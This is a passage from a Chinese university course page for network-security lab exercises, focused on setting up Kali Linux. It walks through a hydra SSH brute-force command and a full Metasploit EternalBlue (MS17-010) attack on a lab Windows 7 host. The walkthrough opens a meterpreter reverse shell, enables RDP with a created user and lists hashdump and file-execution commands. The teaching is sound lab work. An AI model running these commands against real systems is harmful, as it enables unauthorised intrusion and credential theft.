目录

  • 1 §1 实训项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)DVWA-master
      • 1.2.2 (2)sqli-labs(第3次课)
      • 1.2.3 (3)sqlmap
      • 1.2.4 (4)login, loginPHP
      • 1.2.5 (5)Firefox, Hackbar
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 Burp(第2次课)
      • 1.3.1 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.3.2 Q&A-2(作业批改、辅导答疑)
    • 1.4 §1.3 Python
      • 1.4.1 Python的Anaconda3集成开发环境
    • 1.5 §1.4 Kali
      • 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
    • 1.6 §1.5 Wireshark
    • 1.7 2022.09.15腾讯会议答疑
  • 2 §2 实训项目2 SQL注入
    • 2.1 ■(1)SQL注入联合查询(第3次课)
      • 2.1.1 附件:联合查询SQL注入模板
      • 2.1.2 ■模板
    • 2.2 (2)SQL注入(PDF文档)
      • 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 2.2.2 (2)部署sqli-labs学习环境
      • 2.2.3 (3)sqli-labs使用教学
      • 2.2.4 (4)实战:SQL注入联合查询-获取数据库数据
    • 2.3 ■(3)部署loginPHP网站
      • 2.3.1 ●SQL注入测试
      • 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 2.3.3 ①login.php
      • 2.3.4 ②loginAuth.php
      • 2.3.5 ③loginAuth1.php
      • 2.3.6 ④success.php
      • 2.3.7 ⑤failure.php
      • 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 2.4 (4)DVWA的SQL Injection
    • 2.5 (5)拓展视野:靶场SQL注入
  • 3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 3.1 (1)安装DVWA
    • 3.2 (2)安装SQLmap
    • 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 3.4 (4)结果截图(SQLmap拖库)
    • 3.5 (5)使用BurpSuite进行POST方式的SQL注入
    • 3.6 ■附 安装DVWA-1.9(完整版)
  • 4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 4.1 (1)获取Win7系统shell、开启远程桌面
    • 4.2 (2)截图
    • 4.3 (3)Metasploit渗透测试
    • 4.4 (4)使用msf渗透攻击XP并进行远程关机
  • 5 §5 实训项目5 安装Kali渗透测试系统
    • 5.1 BT到Kali的发展史
    • 5.2 (1)安装Kali
    • 5.3 (2)安装BT5
    • 5.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 6 §6 实训项目6 配置Kali渗透测试系统
    • 6.1 (1)安装Kali渗透测试系统
    • 6.2 (2)SSH连接Kali
    • 6.3 (3)※ettercap抓取FTP登录账号和密码
    • 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 7 §7 实训项目7 ARP协议安全攻防
    • 7.1 (1)ARP协议安全攻防(试题)
    • 7.2 (2)※ARP协议安全攻防
    • 7.3 (4)实训 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.4 (3)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.5 演示视频 arpsproof+etthercap实施中间人攻击
  • 8 §8 实训项目8 暴力破解
    • 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 8.2 (2)字典工具pydictor.py
    • 8.3 (3)hydra和xhydra
    • 8.4 (4)Medusa
    • 8.5 (5)离线破解md5值和shadow加密文件
    • 8.6 (6)Brute Force(DVWA)
    • 8.7 (7)Burp Suite(Windows)
    • 8.8 (8)Burp Suite(Kali)
  • 9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
    • 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 9.2 (2)CentOS6.5-desktop及MySQL
  • 10 §10 实训项目10作业 Wireshark抓取Telnet明文包
    • 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 11.1 ●文件上传(PDF文档)
    • 11.2 (1)基于文件上传漏洞获得网站shell权限
    • 11.3 (2)本地文件包含漏洞截图
    • 11.4 (3)课程资料
    • 11.5 (4)课外 编辑器KindEditor文件上传漏洞
  • 12 §12 实训项目12 Nmap
    • 12.1 (1)安全工具
    • 12.2 (2)Nmap
    • 12.3 (3)网络空间安全(系统渗透测试篇)
    • 12.4 (4)信息收集
  • 13 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 13.1 (1)本地文件包含
    • 13.2 (2)远程文件包含
  • 14 §14 实训项目14 XSS跨站脚本攻击
    • 14.1 (1)窃取用户Cookie信息保存到远程服务器
    • 14.2 (2)反射型XSS攻击劫持用户浏览器
    • 14.3 (3)存储型XSS窃取用户信息
  • 15 §15 实训项目15 缓冲区溢出漏洞
  • 16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 17 考核
    • 17.1 平时成绩(40%+30%)
    • 17.2 期末考试(30%)
  • 18 网络1901-04期末考试(2020-2021-2)
    • 18.1 试题1:damicms
    • 18.2 试题2:sqli-labs
    • 18.3 试题3:dvwa
    • 18.4 试题4:loginPHP
  • 19 校外卷重修-B05123网络安全运行与维护复习
    • 19.1 (1)loginPHP
    • 19.2 (2)Python编程
§1.4 Kali

§1.4 Kali


链接:https://pan.baidu.com/s/13sihp9ycrmPzOS78Cpm90Q?pwd=lch1 

提取码:lch1 

下载目录“VM/kali-2021.1-vmware”到D:\VM

在VMware中打开kali-linux-2021.1-vmware-amd64.vmx


1.Kali版本

1.0→2.0→2019.2→2019.4→2020.4→2021.1

                 vmware 桌面xfce               vmware


如果是vmware版,不用下载、安装,直接打开启动!

2.下载Kali镜像文件:

https://mirrors.bfsu.edu.cn/kali-images/kali-2021.1/

kali-linux-2021.1-installer-amd64.iso(4GB)

最新Kali2022.3的镜像文件下载:

https://mirrors.aliyun.com/kali-images/kali-2022.3/kali-linux-2022.3-installer-arm64.iso?spm=a2c6h.25603864.0.0.50d6198aMLmwCl


3.安装:

Linux版本:Debian 10.x 64位

虚拟机名称:Kali2021.1(192.168.112.200)

位置:D:\VM\Kali2021.1(192.168.112.200)

最大磁盘大小:60G

主机名:kali

用户:wl21/123456

写入磁盘:是

1924个文件

/dev/sda


4.启动:



解决中文“麻将问题”(kali2019.4后):

# dpkg-reconfigure locales

  zh_CN.UTF-8  UTF-8

# apt-get install xfonts-intl-chinese

# apt-get install ttf-wqy-microhei ttf-wqy-zenhei

# echo LANG="zh_CN.UTF-8" > /etc/default/locale


5.终端切换root用户:

$ sudo su -

输入kali的密码kali



6.虚拟机kali-2021.1-vmware的网络配置:

$ sudo vim /etc/network/interfaces  #配置网卡

auto eth0 

iface eth0 inet static

address 192.168.112.200

netmask 255.255.255.0

gateway 192.168.112.2

$ sudo vim /etc/resolv.conf      #配置DNS


# Generated by NetworkManager 

search localdomain 

nameserver 192.168.112.2

$ sudo  systemctl restart networking   #重启网卡

$ ip a   #显示IP

$ ping www.baidu.com    #通


7.apt源:

# vim /etc/apt/sources.list 

#北京邮电大学

deb http://mirrors.bfsu.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.bfsu.edu.cn/kali kali-rolling main non-free contrib

# apt-get update && apt-get upgrade && apt-get clean 

# apt-get install ibus ibus-pinyin  #安装中文输入法Google拼音,<Ctrl>+空格切换英文输入方法


8.使用

(1)破解Linux登录密码:

# hydra -l root -P cd.txt -t 1 -vV -e ns 192.168.112.100 ssh

# 其中cd.txt为当前家目录下的字典,Linux为CentOS7.8(192.168.112.100)

root用户的密码为:123456


(2)burpsuite:


(3)metasploit:

# msfconsole



9.实战——使用永恒之蓝漏洞获取Win7系统shell及远程桌面

参见学习通的章节4.1:

https://mooc1-2.chaoxing.com/mycourse/teacherstudy?chapterId=176607313&courseId=205573442&clazzid=59697986

1.# systemctl start postgresql    #开启数据库

   # systemctl enable postgresql   #开机自启数据库

2.# msfdb init                    #初始化msf数据库

3.# msfconsole                  #开启MSF

msf6 > use auxiliary/scanner/smb/smb_ms17_010

msf6 auxiliary(scanner/smb/smb_ms17_010)> set RHOSTS 192.168.112.101

msf6 auxiliary(scanner/smb/smb_ms17_010)> exploit


[+] 192.168.112.101:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.112.101:445   - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

eternal   [ɪˈtɜːnl]   永恒的

msf6 exploit(windows/smb/ms17_010_eternalblue)> show options

msf6 exploit(windows/smb/ms17_010_eternalblue)> set RHOSTS 192.168.112.101

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.112.200

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Meterpreter session 1 opened (192.168.112.200:4444 -> 192.168.112.101:49265) at 2022-09-12 15:44:23 -0400

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.112.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

查看权限:

meterpreter >getuid

meterpreter >sysinfo


启用远程桌面(加载RDP协议)

meterpreter> run post/windows/manage/enable_rdp

创建一个新用户来远程连接Win7桌面

meterpreter> run post/windows/manage/enable_rdp USERNAME=lch PASSWORD=123456


meterpreter> shell



在Kali系统上,按下Ctrl+Shift+T新建终端窗口,或点击终端按钮开启一个终端:root@kali:~#rdesktop 192.168.112.101
















[*] exec: rdesktop 192.168.112.101

UI(error): ui_init(), failed to open X11 display:




扫描、攻击靶机主要步骤:

auxiliary扫描

1.扫描靶机

  msf6 > use auxiliary/scanner/smb/smb_ms17_010

             auxiliary/功能       /服务/名称

  options 

  设置目标地址:set RHOSTS 192.168.112.101

  设置目标端口:setRPORT  445

2.扫描

  run/exploit

exploit攻击

3.攻击靶机

  use exploit/windows/smb/ms17_010_eternalblue

      exploit/操作系统/服务/名称

  options

  设置目标地址:set RHOSTS 192.168.112.101

  设置目标端口:setRPORT  445

payload

4.选择payload

  set payloadwindows/x64/meterpreter/reverse_tcp

            payload操作系统/类型/名称

  options

  设置本地地址:setLHOST  192.168.112.200

5.攻击

  run/exploit

 

Step 1扫描靶机

msf5 >useauxiliary/scanner/smb/smb_ms17_010

Required栏为yes,则CurrentSetting栏内的值需要进行设置

[+]表示有此漏洞

 

Step 2选择exploit

msf5auxiliary(scanner/smb/smb_ms17_010) > useexploit/windows/smb/ms17_010_eternalblue

option 显示选项,通常在exploit模块中,我们需要设置靶机的地址,即RHOST

 

Step 3exploit(实战拿shell)

 

 

meterpreter(后渗透工具meterpreter)

查看用户权限: meterpreter>getuid

获取hash密码:meterpreter> hashdump

上传文件: meterpreter>upload

执行文件: meterpreter>execute -f  notepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

MSF基础命令:

help/?               帮助菜单

exit|quit     退出MSF控制台

history

sessions        会话

set                 设置选项

unset             取消设置的选项

模块命令:

back               返回上一级

info                显示一个或者多个模块的信息

options

search

show                   显示所给类型的模块

use                 使用所选择的模块

 

background   将当前操作在后台运行

session        会话

 

db_connect    连接数据库

db_nmap        扫描目的服务器端口



MSF简介:

MSF—The Metasploit Framework

漏洞框架,综合渗透测试框架,漏洞攻击

从漏洞发现,掌握渗透测试常用工具。

MSF漏洞利用方向,学会MSF使用方法。学会从漏洞利用提权再到免杀全流程。

1.metasploit框架介绍

2.metasploit模块介绍

3.常用基础指令

4.msf攻击流程

5.后渗透工具meterpreter

 

综合渗透测试框架:

auxiliary        辅助模块            信息搜集

exploits        攻击模块           利用发现的安全漏洞或配置弱点对远程目标系统进行攻击

payload        攻击载荷模块            攻击成功后促使靶机运行的一段植入代码

post                后渗透攻击模块   收集更多信息或进一步访问被利用的目标系统

encoders       编码模块             将攻击载荷进行编码,来绕过防护软件拦截